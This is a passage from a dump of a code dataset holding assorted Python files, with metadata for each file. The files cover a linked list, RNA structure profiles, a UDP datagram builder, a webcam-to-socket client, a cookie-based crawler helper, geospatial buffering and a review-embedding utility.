o.rawImportance,\n total)\n o.relativeImportance = o.rawImportance / total\n\n def updateIntraStringUnhappiness(self):\n if not len(self.objects):\n self.intraStringUnhappiness = 0.0\n return\n total = sum([o.intraStringUnhappiness for o in self.objects])\n self.intraStringUnhappiness = total / len(self.objects)\n\n def equivalentGroup(self, sought):\n from group import Group\n\n for objekt in self.objects:\n if isinstance(objekt, Group):\n if objekt.sameGroup(sought):\n return objekt\n return None\n","sub_path":"copycat/workspaceString.py","file_name":"workspaceString.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209472560","text":"#suboptimal_structures_folder = 'RDS_barna_suboptimal_confs/'\nsuboptimal_structures_folder = 'PDS_barna_suboptimal_confs/'\n\n#fasta_file = '../../input/refined_dataset_FASTA.txt'\nfasta_file = '../../input/paper_dataset_FASTA.txt'\n\n#shape_profile_folder = 'RDS_SHAPE_data/barna_subopt/'\nshape_profile_folder = 'PDS_SHAPE_data/barna_subopt/'\n\ndef read_fasta_file(fasta_file_path):\n # open .fasta file\n with open(fasta_file_path, 'r') as fasta_file:\n fasta_file_content = fasta_file.readlines()\n #create a dictionary\n sequences = {}\n for line in fasta_file_content:\n line = line.rstrip()\n if line.startswith('>'):\n name = line[1:]\n sequences[name] = ''\n else:\n sequences[name] = line\n return sequences\n\ndef read_suboptimal_structures_file(path):\n structures = []\n with open(path, 'r') as structures_file:\n structures_file_content = structures_file.readlines()\n for line in structures_file_content:\n #print(line[0:-1])\n words = line[0:-1].split('\\t')\n #print(words[0])\n structures.append(words[0])\n return structures\n\n\nsequences = read_fasta_file(fasta_file)\nsequence_names = [name for name in sequences]\n\nex_names = ['PDB_00066.dp']\n\n#for name in ex_names:\nfor name in sequence_names:\n shape_profile = {}\n sequence = sequences[name]\n suboptimal_structures_path = suboptimal_structures_folder + name + '_configurations.txt'\n #print(suboptimal_structures_path)\n #print(read_suboptimal_structures_file(suboptimal_structures_path))\n structures = read_suboptimal_structures_file(suboptimal_structures_path)\n profile_path = shape_profile_folder + name + '_ann_shape.txt'\n #print(profile_path)\n for i in range(len(sequences[name])):\n score = sum(1 for structure in structures if structure[i] == '.') / len(structures)\n #print(i, score)\n shape_profile[i] = score\n if i == 0:\n with open(profile_path, 'w') as output_file:\n output_file.write(str(i + 1) + '\\t' + sequence[i] + '\\t' + str(score))\n else:\n with open(profile_path, 'a') as output_file:\n output_file.write('\\n' + str(i + 1) + '\\t' + sequence[i] + '\\t' + str(score))\n","sub_path":"utilities/new_vienna_with_shape/shape_profiles_from_barna_subopt.py","file_name":"shape_profiles_from_barna_subopt.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460121645","text":"from .node import Node\r\nfrom .empty_exception import Empty\r\n\r\n\r\nclass DoublyLinkedList:\r\n def __init__(self):\r\n self._header = Node(None, None, None) \r\n self._trailer = Node(None, None, None) \r\n self._header._next = self._trailer \r\n self._trailer._prev = self._header \r\n self._size = 0 \r\n\r\n def __len__(self):\r\n return self._size\r\n\r\n def is_empty(self):\r\n return self._size == 0\r\n\r\n def first_node(self):\r\n if self.is_empty(): \r\n raise Empty(\"Lista is empty, it doesnt have first node!\")\r\n return self._header._next\r\n\r\n def last_node(self):\r\n if self.is_empty():\r\n raise Empty(\"List is empty, it doesn't have last node!\")\r\n return self._trailer._prev\r\n\r\n def first(self):\r\n try:\r\n return self.first_node()._element\r\n except Empty as e:\r\n print(e)\r\n\r\n def last(self):\r\n try:\r\n return self.last_node()._element\r\n except Empty as e:\r\n print(e)\r\n\r\n def add_first(self, e):\r\n new_node = Node(e, self._header, self._header._next) \r\n self._header._next._prev = new_node \r\n self._header._next = new_node \r\n self._size += 1 \r\n\r\n def add_last(self, e):\r\n new_node = Node(e, self._trailer._prev, self._trailer) \r\n self._trailer._prev._next = new_node \r\n self._trailer._prev = new_node \r\n self._size += 1\r\n\r\n def insert_between(self, e, predecessor, successor):\r\n newest = Node(e, predecessor, successor) \r\n predecessor._next = newest \r\n successor._prev = newest\r\n self._size += 1 \r\n return newest \r\n\r\n def delete_node(self, node):\r\n if self.is_empty(): \r\n raise Empty(\"It's impossible to remove an element. List is empty!\")\r\n predecessor = node._prev \r\n successor = node._next\r\n predecessor._next = successor\r\n successor._prev = predecessor\r\n self._size -= 1 \r\n element = node._element \r\n node._prev = node._next = node._element = None \r\n return element \r\n","sub_path":"Trees/queue_dll/doubly_linked_list/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516458452","text":"import socket\nimport cv2\nimport numpy\nimport pickle\nimport time\nfrom threading import Timer,Thread,Event\n\nclass socket_client():\n\n def __init__(self , ip, port):\n \n self.ClientSocket = socket.socket()\n self.ClientSocket.connect((ip, port))\n \n def prepare_pic(self):\n \n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n capture = cv2.VideoCapture(0)\n ret, frame = capture.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n result, frame = cv2.imencode('.jpg', frame, encode_param)\n data = pickle.dumps(frame, 0)\n size = str(len(data)).ljust(16).encode('utf-8')\n return (size , data)\n \n def send_image(self , data_tup):\n header = data_tup[0]\n print(header)\n data = data_tup[1]\n self.ClientSocket.send(header)\n self.ClientSocket.send(data)\n\n def repited_send(self , times):\n\n for i in range(0 , 15):\n\n self.send_image(self.prepare_pic())\n time.sleep(3)\n\n\n\n","sub_path":"Classes/clientClass.py","file_name":"clientClass.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31355517","text":"#!/usr/bin/python\r\n#coding : utf8\r\n__all__ = ['get']\r\nif __name__ != '__main__':\r\n def get(url,post=''):\r\n import urllib2,cookielib,urllib\r\n \r\n cookiefile = './cookies.txt'\r\n \r\n ckjar = cookielib.MozillaCookieJar(cookiefile)\r\n \r\n ckjar.load(cookiefile, ignore_discard=True, ignore_expires=True)\r\n \r\n req = urllib2.Request(url) \r\n \r\n req.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')\r\n req.add_header('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8') \r\n req.add_header('Accept-Encoding','gzip, deflate')\r\n req.add_header('Referer','http://i.youxinpai.com/TradeManage/tradelist.aspx')\r\n req.add_header('Host','i.youxinpai.com')\r\n req.add_header('Connection','keep-alive')\r\n req.add_header('Accept-Language','zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3')\r\n \r\n httpHandler = urllib2.HTTPHandler(debuglevel=0)\r\n opener = urllib2.build_opener(httpHandler,urllib2.HTTPCookieProcessor(ckjar) )\r\n \r\n urllib2.install_opener(opener)\r\n \r\n if post != '':\r\n data = urllib2.urlopen(url,urllib.urlencode(post)).read()\r\n else:\r\n data = urllib2.urlopen(url).read()\r\n ckjar.save('./cookies.txt',ignore_discard=True, ignore_expires=True) \r\n return data","sub_path":"crawl/myCurl.py","file_name":"myCurl.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"563335731","text":"#!/usr/bin/env python3\n\nfrom timfuz import Benchmark, loadc_Ads_bs, load_sub, Ads2bounds, corners2csv, corner_s2i\n\n\ndef gen_flat(fns_in, sub_json, corner=None):\n Ads, bs = loadc_Ads_bs(fns_in)\n bounds = Ads2bounds(Ads, bs)\n # Elements with zero delay assigned due to sub group\n group_zeros = set()\n # Elements with a concrete delay\n nonzeros = set()\n\n if corner:\n zero_row = [None, None, None, None]\n zero_row[corner_s2i[corner]] = 0\n else:\n zero_row = None\n\n for bound_name, bound_bs in bounds.items():\n sub = sub_json['subs'].get(bound_name, None)\n if bound_name in sub_json['zero_names']:\n if zero_row:\n yield bound_name, 0\n elif sub:\n #print('sub', sub)\n # put entire delay into pivot\n pivot = sub_json['pivots'][bound_name]\n assert pivot not in group_zeros\n nonzeros.add(pivot)\n non_pivot = set(sub.keys() - set([pivot]))\n #for name in non_pivot:\n # assert name not in nonzeros, (pivot, name, nonzeros)\n group_zeros.update(non_pivot)\n #print('yield PIVOT', pivot)\n yield pivot, bound_bs\n else:\n nonzeros.add(bound_name)\n yield bound_name, bound_bs\n # non-pivots can appear multiple times, but they should always be zero\n # however, due to substitution limitations, just warn\n violations = group_zeros.intersection(nonzeros)\n if len(violations):\n print('WARNING: %s non-0 non-pivot' % (len(violations)))\n\n # XXX: how to best handle these?\n # should they be fixed 0?\n if zero_row:\n # ZERO names should always be zero\n #print('ZEROs: %u' % len(sub_json['zero_names']))\n for zero in sub_json['zero_names']:\n #print('yield ZERO', zero)\n yield zero, zero_row\n\n real_zeros = group_zeros - violations\n print(\n 'Zero candidates: %u w/ %u non-pivot conflicts => %u zeros as solved'\n % (len(group_zeros), len(violations), len(real_zeros)))\n # Only yield elements not already yielded\n for zero in real_zeros:\n #print('yield solve-0', zero)\n yield zero, zero_row\n\n\ndef run(fns_in, fnout, sub_json, corner=None, verbose=False):\n with open(fnout, 'w') as fout:\n fout.write('ico,fast_max fast_min slow_max slow_min,rows...\\n')\n for name, corners in sorted(list(gen_flat(fns_in, sub_json,\n corner=corner))):\n row_ico = 1\n items = [str(row_ico), corners2csv(corners)]\n items.append('%u %s' % (1, name))\n fout.write(','.join(items) + '\\n')\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Substitute .csv to ungroup correlated variables')\n\n parser.add_argument('--verbose', action='store_true', help='')\n parser.add_argument('--sub-csv', help='')\n parser.add_argument(\n '--sub-json',\n required=True,\n help='Group substitutions to make fully ranked')\n parser.add_argument('--corner', default=None, help='')\n parser.add_argument('--out', default=None, help='output timing delay .csv')\n parser.add_argument(\n 'fns_in',\n nargs='+',\n help='input timing delay .csv (NOTE: must be single column)')\n args = parser.parse_args()\n # Store options in dict to ease passing through functions\n bench = Benchmark()\n\n sub_json = load_sub(args.sub_json)\n\n try:\n run(\n args.fns_in,\n args.out,\n sub_json=sub_json,\n verbose=args.verbose,\n corner=args.corner)\n finally:\n print('Exiting after %s' % bench)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fuzzers/007-timing/csv_group2flat.py","file_name":"csv_group2flat.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194798310","text":"from osgeo import ogr, osr\n\n\n\nclass BufferMaker(object):\n\n def __init__(self):\n # EPSG:4326 : WGS84 lat/lon : http://spatialreference.org/ref/epsg/4326/\n self.wgs = osr.SpatialReference()\n self.wgs.ImportFromEPSG(4326)\n self.coord_trans_cache = {}\n\n\n def utm_zone(self, lat, lon):\n \"\"\"Args for osr.SpatialReference.SetUTM(int zone, int north = 1)\"\"\"\n return int(round(((float(lon) - 180) % 360)/6)), int(lat > 0)\n\n\n def add_buffer(self, original_lonlat_points, buffer_dist_km):\n\n lon1, lat1 = original_lonlat_points[0]\n\n # Get projections sorted out for that UTM zone\n cur_utm_zone = self.utm_zone(lat1, lon1)\n if cur_utm_zone in self.coord_trans_cache:\n self.wgs2utm, self.utm2wgs = self.coord_trans_cache[cur_utm_zone]\n else: # define new UTM Zone\n utm = osr.SpatialReference()\n utm.SetUTM(*cur_utm_zone)\n # Define spatial transformations to/from UTM and lat/lon\n self.wgs2utm = osr.CoordinateTransformation(self.wgs, utm)\n self.utm2wgs = osr.CoordinateTransformation(utm, self.wgs)\n self.coord_trans_cache[cur_utm_zone] = self.wgs2utm, self.utm2wgs\n\n ring = ogr.Geometry(ogr.wkbLinearRing)\n for (lon, lat) in original_lonlat_points:\n ring.AddPoint(lon, lat)\n poly = ogr.Geometry(ogr.wkbPolygon)\n poly.AddGeometry(ring)\n\n original_wkt = poly.ExportToWkt()\n\n # Project to UTM\n res = poly.Transform(self.wgs2utm)\n if res != 0:\n print(\"spatial transform failed with code \" + str(res))\n # print(original_wkt + \" -> \" + poly.ExportToWkt())\n #\n # print(\"Original area: \" + str(poly.GetArea()/1e6) + \" km^2\")\n\n\n # Compute a 15 km buffer\n buff = poly.Buffer(buffer_dist_km*1000)\n # print(\"Area: \" + str(buff.GetArea()/1e6) + \" km^2\")\n # Transform UTM buffer back to lat/long\n res = buff.Transform(self.utm2wgs)\n if res != 0:\n print(\"spatial transform failed with code \" + str(res))\n # print(\"Envelope: \" + str(buff.GetEnvelope()))\n # print(\"WKT: \" + buff.ExportToWkt())\n\n # print \"New polygon: \", buff\n\n buffer_coordinates = []\n for coord in self.get_coordinates(buff)[0]:\n buffer_coordinates.append((coord[0], coord[1]))\n\n return buffer_coordinates\n\n\n\n\n def get_coordinates(self, geometry):\n gtype = geometry.GetGeometryType()\n geom_count = geometry.GetGeometryCount()\n coordinates = []\n\n if gtype == ogr.wkbPoint or gtype == ogr.wkbPoint25D:\n return [geometry.GetX(0), geometry.GetY(0)]\n\n if gtype == ogr.wkbMultiPoint or gtype == ogr.wkbMultiPoint25D:\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n if gtype == ogr.wkbLineString or gtype == ogr.wkbLineString25D:\n points = []\n point_count = geometry.GetPointCount()\n for i in range(point_count):\n points.append([geometry.GetX(i), geometry.GetY(i)])\n return points\n\n if gtype == ogr.wkbMultiLineString or gtype == ogr.wkbMultiLineString25D:\n coordinates = []\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n if gtype == ogr.wkbPolygon or gtype == ogr.wkbPolygon25D:\n geom = geometry.GetGeometryRef(0)\n coordinates = self.get_coordinates(geom)\n return [coordinates]\n\n if gtype == ogr.wkbMultiPolygon or gtype == ogr.wkbMultiPolygon25D:\n\n coordinates = []\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n\n\n# import simplekml\n# kml = simplekml.Kml()\n#\n#\n# def add_poly_to_kml(kml, name, lonlat_coordinates, color):\n# kml_poly = kml.newpolygon()\n# kml_poly.name = name\n#\n# print \"Exporting coordinates: \", lonlat_coordinates\n# # lonlat_coordinates.append(lonlat_coordinates[0])\n# kml_poly.outerboundaryis.coords = lonlat_coordinates\n# kml_poly.style.polystyle.color = simplekml.Color.changealphaint(100, color)\n#\n# kml_poly.description = name\n#\n#\n# bm = BufferMaker()\n#\n#\n# center_lat = 40\n# center_lon = -110\n# latitude_width = 1.0\n# longitude_width = 1.0\n# max_lat = center_lat + latitude_width/2\n# min_lat = center_lat - latitude_width/2\n# max_lon = center_lon + longitude_width/2\n# min_lon = center_lon - longitude_width/2\n#\n# box = [(min_lon, max_lat), (max_lon, max_lat), (max_lon, min_lat),\n# (min_lon, min_lat)]\n# box.append(box[0])\n# lons = [lon for lon, lat in box]\n# lats = [lat for lon, lat in box]\n#\n# print \"Box: \", box\n#\n#\n# add_poly_to_kml(kml, \"Original polygon\", box, simplekml.Color.blue)\n#\n# buffer_coordinates = bm.add_buffer(box, 25)\n# add_poly_to_kml(kml, \"Buffered_polygon\", buffer_coordinates,\n# simplekml.Color.red)\n#\n# kml.save(\"buffer_test2.kml\")\n#\n","sub_path":"buffer_maker.py","file_name":"buffer_maker.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456968739","text":"# 时间复杂度O(n^2)\r\n# 解题思想:多设置几个变量保存值并进行判断,注意细节\r\nN, M = map(int, input().split()) # N:苹果树的棵树,M:疏果操作的轮数\r\nApple = [[0 for i in range(M + 1)] for j in range(N)] # 初始化苹果列表\r\n# Apple[i][0]代表的是第i棵树初始的苹果数 Apple[i][1-M]代表的是第i棵树疏果的个数\r\nAppleCount = [0 for i in range(N)] # 疏果操作结束后每棵树的苹果个数\r\nCount = 0 # 疏果操作结束后总的苹果个数\r\nMax = 0 # 最多的疏果个数\r\nMaxID = 0 # 疏果个数最多的苹果树的编号\r\nfor i in range(N):\r\n Apple[i] = [int(n) for n in input().split()] # 输入一行列表的值\r\n for j in range(M + 1):\r\n AppleCount[i] += Apple[i][j]\r\n Count += AppleCount[i] # 完成T操作\r\n if Apple[i][0] - AppleCount[i] > Max:\r\n Max = Apple[i][0] - AppleCount[i] # 完成P操作\r\n MaxID = i # 完成K操作\r\n elif Apple[i][0] - AppleCount[i] == Max and i < MaxID: # 补充K操作的意外条件\r\n MaxID = i\r\n# 按题目格式进行输出\r\nprint(str(Count) + \" \" + str(MaxID + 1) + \" \" + str(Max))\r\n","sub_path":"_20190901.py","file_name":"_20190901.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83528033","text":"import os\nfrom PIL import Image\n\ndef create(size):\n image = Image.new(\"RGB\", (size, size), (255, 255, 255) )\n for x in range(size):\n for y in range(size):\n if x < y:\n image.putpixel((x,y), (0, 0, 0))\n return image\n\nimage = create(500)\nimage.show()\nimage.save(os.path.join(\"image\", \"black-white.jpg\"))\n","sub_path":"src/processamento-imagens/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"625669707","text":"class UDPSenderClass(object):\n # Constuctor\n def __init__(self, i, sip, dip, sp=0, dp=0, dg=None):\n self.data = list(i)\n self.dataLength = len(self.data)\n self.UDPLength = 0\n self.sourceIP = list(sip.split('.'))\n self.destIP = list(dip.split('.'))\n self.sourcePort = int(sp)\n self.destPort = int(dp)\n self.datagram = dg\n self.binData = []\n self.bdi = 0\n self.checksum = 0\n self.csIP = ''\n self.cdIP = ''\n\n #Determining length of data and UDP header in bytes\n def setLength(self, header):\n self.UDPLength = self.dataLength + header\n\n #pads data if its not even\n def addPadding(self):\n if len(self.data) % 2 is 1:\n self.data.append(str(0))\n\n #Forming the pseudo header\n def addPseudoHeader(self):\n #Add Source IP address\n for i in xrange(0, len(self.sourceIP), 2):\n self.binData.append('{0:08b}'.format(int(self.sourceIP[i])))\n self.binData[self.bdi] += '{0:08b}'.format(int(self.sourceIP[i + 1]))\n self.bdi += 1\n #Add Destination IP address\n for i in xrange(0, len(self.destIP), 2):\n self.binData.append('{0:08b}'.format(int(self.destIP[i])))\n self.binData[self.bdi] += '{0:08b}'.format(int(self.destIP[i + 1]))\n self.bdi += 1\n\n #Add zeros, protocol value = 17 and UDP length\n self.binData.append('0000000000010001')\n self.binData.append('{0:016b}'.format(self.UDPLength))\n self.bdi += 2\n\n #Adds source and destination port numbers and length in binary\n def addUDPHeader(self):\n self.binData.append('{0:016b}'.format(self.sourcePort))\n self.binData.append('{0:016b}'.format(self.destPort))\n self.binData.append('{0:016b}'.format(self.UDPLength))\n self.bdi += 3\n\n #Concatenates binary Data for Checksum calculation\n def makeBinary(self):\n for i in xrange(0, len(self.data), 2):\n self.binData.append('{0:08b}'.format(ord(self.data[i])))\n self.binData[self.bdi] += '{0:08b}'.format(ord(self.data[i + 1]))\n self.bdi += 1\n\n #Converts Binary back into integers\n def convertStrings(self):\n for i in xrange(0, len(self.binData)):\n self.binData[i] = int(self.binData[i], 2)\n\n #Computes Checksum\n def checkSum(self):\n self.checksum = self.binData[0]\n for i in xrange(1, len(self.binData)):\n self.checksum += self.binData[i]\n # For carry. Cannot exceed 65535 for 16 bits\n if self.checksum > 65535:\n self.checksum = self.checksum - 65535\n self.checksum = self.checksum ^ 65535\n\n # Removes pseudoheader and inserts check sum value\n def createDatagram(self):\n for i in xrange(6):\n del self.binData[0]\n for i in xrange(2, len(self.binData)):\n self.binData[i] = self.changeEndian(self.binData[i])\n self.binData.insert(3, self.checksum)\n\n def changeEndian(self, bEnd):\n value = '{0:016b}'.format(bEnd)\n f, s = value[0:8], value[8:16]\n value = s + f\n return int(value, 2)\n\n #Writes binary file to output file passed in arguments\n def writeFile(self, fileName):\n file = open(fileName, 'wb')\n for i in xrange(len(self.binData) - 1):\n value = '{0:016b}'.format(self.binData[i])\n file.write(chr(int(value[0:8], 2)))\n file.write(chr(int(value[8:16], 2)))\n if len(self.data) % 2 is 1:\n value = '{0:016b}'.format(self.binData[-1])\n file.write(chr(int(value[0:8], 2)))\n else:\n value = '{0:016b}'.format(self.binData[-1])\n file.write(chr(int(value[0:8], 2)))\n file.write(chr(int(value[8:16], 2)))\n file.close()\n\n #Converts IP addresses to hex\n def conIPs(self):\n for i in xrange(len(self.sourceIP) - 1, -1, -1):\n temp = format(int(self.sourceIP[i]), '02x')\n self.csIP += temp\n temp = format(int(self.destIP[i]), '02x')\n self.cdIP += temp\n\n #Parent function. Calls all other functions\n def createUDP(self):\n self.setLength(8)\n self.addPadding()\n self.addPseudoHeader()\n self.addUDPHeader()\n self.makeBinary()\n self.convertStrings()\n self.checkSum()\n self.createDatagram()\n self.writeFile(self.datagram)\n self.conIPs()\n\n #To string method\n def __str__(self):\n return \"\\nBig-endian IP:\\n\\nSource IP: \" + self.csIP + \"\\nDestination IP: \" + \\\n self.cdIP + \"\\n\\nSource IP byte 1: \" + str(self.sourceIP[0]) + \"\\nSource IP byte 2: \" + \\\n str(self.sourceIP[1]) + \"\\nSource IP byte 3: \" + str(self.sourceIP[2]) + \"\\nSource IP byte 4: \" + \\\n str(self.sourceIP[3]) + \"\\nDestination IP byte 1: \" + str(self.destIP[0]) + \"\\nDestination IP byte 2: \" + \\\n str(self.destIP[1]) + \"\\nDestination IP byte 3: \" + str(self.destIP[2]) + \"\\nDestination IP byte 4: \" + \\\n str(self.destIP[3]) + \"\\n\\nSource port: \" + str(self.sourcePort) + \"\\nDestination port: \" + str(self.destPort) + \\\n \"\\n\\nfile size (Byte, without zero padding): \" + str(self.dataLength) + \"\\ntotal length(bytes): \" + \\\n str(self.UDPLength) + \"\\n\\nChecksum: \" + str(hex(self.checksum).lstrip(\"0x\")) + \\\n \"\\n\\nFile was successfully written to \" + self.datagram + \"\\n\"\n","sub_path":"UDPSenderClass.py","file_name":"UDPSenderClass.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503177172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\nimport time\nimport random\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import backend as K\n\nEMBEDDING_DIM = 300\nnumpy.random.seed(137)\n\n\ndef get_best_review_for_item(source='../dataset/best_review_for_item.txt'):\n item_to_review = {}\n for line in open(source, mode='r'):\n parts = line.strip().split('\\t')\n item_id = parts[0]\n review_id = parts[1]\n item_to_review[item_id] = review_id\n\n return item_to_review\n\n\ndef get_glove_embeddings():\n embeddings_index = {}\n for line in open('../dataset/glove.6B.300d.txt', mode='r'):\n values = line.strip().split()\n word = values[0]\n coefs = numpy.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\n return embeddings_index\n\n\ndef get_item_factors(source ='../dataset/itemFactors.txt'):\n item_factors = {}\n for line in open(source, mode='r'):\n parts = line.strip().split(',')\n item_id_with_first_factor = parts[0]\n item_id = item_id_with_first_factor.split(':')[0]\n first_factor = numpy.asarray(item_id_with_first_factor.split(':')[1], dtype='float32')\n other_factors = numpy.asarray(parts[1:], dtype='float32')\n factors_for_item = numpy.append(first_factor, other_factors)\n item_factors[item_id] = factors_for_item\n\n return item_factors\n\n\ndef get_embeddings_and_sequences(source='../dataset/processed_reviews_text.txt'):\n start_time = time.time()\n\n item_factors = get_item_factors()\n review_texts = []\n review_factors = numpy.zeros((229901, 20), dtype='float32')\n reviews = []\n review_index = 0\n\n for line in open(source, mode='r'):\n parts = line.strip().split('\\t')\n item_id = parts[0]\n review_id = parts[1]\n\n reviews.append(review_id)\n\n review_factors[review_index] = item_factors[item_id]\n review_texts.append(' '.join(parts[2:]))\n\n review_index += 1\n\n tokenizer = Tokenizer(filters='')\n tokenizer.fit_on_texts(review_texts)\n review_sequences = pad_sequences(tokenizer.texts_to_sequences(review_texts))\n word_index = tokenizer.word_index\n\n glove_embeddings = get_glove_embeddings()\n\n embeddings_matrix = numpy.zeros((len(word_index)+1, EMBEDDING_DIM))\n for word, index in word_index.items():\n embedding_vector = glove_embeddings.get(word)\n if embedding_vector is not None:\n embeddings_matrix[index] = embedding_vector\n else:\n embeddings_matrix[index] = numpy.random.uniform(-0.25, 0.25, EMBEDDING_DIM)\n\n print('Dataset is read in memory for ' + str(time.time() - start_time) + ' seconds.')\n\n return embeddings_matrix, review_sequences, review_factors, reviews\n\n\n# splits the dataset in training, test and prediction set\n# so that for each item in the training set, 80% of it's reviews are in the training set, and the rest are in the test set.\ndef get_training_test_and_prediction_set(reviews_sequences, reviews_factors,reviews):\n start_time = time.time()\n\n train_set_x = []\n train_set_y = []\n test_set_x = []\n test_set_y = []\n prediction_set = []\n prediction_items = []\n\n training_set_content = [line.strip() for line in open('../dataset/training_set_with_review_id.txt', mode='r')]\n training_set_length = len(training_set_content)\n # random.shuffle(training_set_content)\n\n reviews_indexed = {reviews[i]: i for i in range(0, len(reviews))}\n\n for line in training_set_content:\n training_instance = line.split('\\t')\n review_id = training_instance[3]\n\n if review_id in reviews_indexed:\n index = reviews_indexed[review_id]\n sequence_for_review = reviews_sequences[index]\n factors_for_review = reviews_factors[index]\n\n if len(train_set_x) <= (0.9 * training_set_length):\n train_set_x.append(sequence_for_review)\n train_set_y.append(factors_for_review)\n else:\n test_set_x.append(sequence_for_review)\n test_set_y.append(factors_for_review)\n\n items_in_validation_set = set()\n best_reviews_for_items = get_best_review_for_item()\n\n for line in open('../dataset/test_set_whole.txt', mode='r'):\n validation_instance = line.strip().split('\\t')\n item_id = validation_instance[1]\n\n if item_id not in items_in_validation_set:\n best_review_for_item = best_reviews_for_items[item_id]\n review_index = reviews_indexed[best_review_for_item]\n sequence_for_review = reviews_sequences[review_index]\n prediction_set.append(sequence_for_review)\n prediction_items.append(item_id)\n\n items_in_validation_set.add(item_id)\n\n print('Dataset is split into training, test and prediction for ' + str(time.time() - start_time) + ' seconds.')\n\n return numpy.array(train_set_x), numpy.array(train_set_y), numpy.array(test_set_x), numpy.array(test_set_y), numpy.array(prediction_set),prediction_items\n\n\ndef get_prediction_set(prediction_indexes, reviews_sequences):\n sequences_to_predict = numpy.zeros(shape=(len(prediction_indexes), len(reviews_sequences[0])), dtype='int32')\n for i in range(0, len(prediction_indexes)):\n sequences_to_predict[i] = reviews_sequences[prediction_indexes[i]]\n\n return sequences_to_predict\n\n\ndef get_array_elements_as_string(arr):\n array_as_string = []\n for x in numpy.nditer(arr):\n array_as_string.append(str(x))\n\n return array_as_string\n\n\ndef write_factors_predictions(prediction_items, predictions, epoch):\n factor_predictions_output = open('output/factor_predictions_' + str(epoch) + '.txt', mode='w')\n for i in range(0, len(prediction_items)):\n\n predictions_for_item = predictions[i]\n factors_output = '\\t'.join(get_array_elements_as_string(predictions_for_item))\n\n item_id = prediction_items[i]\n\n factor_predictions_output.write(item_id + '\\t' + factors_output)\n factor_predictions_output.write('\\n')\n\n factor_predictions_output.flush()\n factor_predictions_output.close()\n\n\ndef RMSE(y_true, y_pred):\n return K.sqrt(K.mean(K.square(y_pred - y_true)))","sub_path":"convolutionalNeuralNetwork/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325317689","text":"'''\nCreated on Jul 25, 2016\n\n@author: Sunny\n'''\nimport json\nimport sys\nimport texttable as tt\n\nclass cls_ReadJson:\n def __init__(self):\n pass\n def m_ReadJson(self,fileName):\n self.m_PrintInTable('json file',fileName)\n try:\n with open(fileName) as obj_json:\n json_data=obj_json.read()\n print('json raw file---------------------')\n print(json_data)\n json_dict=json.loads(json_data)\n print('json dictionary for Python---------------------')\n print(json_dict)\n return json_dict\n except Exception as e:\n print('Parsing Error in JSON file: ',fileName)\n print('ERROR: ',e)\n sys.exit('The program can not proceed further.')\n def m_PrintInTable(self,str_key,str_value):\n tab = tt.Texttable()\n #tab.set_deco(tab.HEADER)\n #tab.set_deco(2)\n tab.set_cols_width([50, 100])\n tab.set_cols_align(['l', 'l'])\n str_value=': '+str_value\n row=[str_key,str_value]\n tab.add_row(row)\n print(tab.draw())\n ","sub_path":"Camellia/Mod/Mod_ReadJson.py","file_name":"Mod_ReadJson.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201238483","text":"T=int(input())\nfor i in range (T):\n N=int(input())\n myheights=[]\n for j in range (2*N-1):\n line=input().split()\n for k in range (N):\n line[k]=int(line[k])\n myheights.append(line)\n heightcount={}\n for j in range (2501):\n heightcount[j]=0\n for row in myheights:\n for height in row:\n heightcount[height]+=1\n output=\"\"\n for j in range (2501):\n if heightcount[j]%2==1:\n output+=\" \" + str(j) \n print (\"Case #\" + str(i+1) + \":\" + output)\n","sub_path":"codes/CodeJamCrawler/16_1_2/Dukati8/Rank and File B.py","file_name":"Rank and File B.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588180117","text":"import math\nimport itertools\nimport 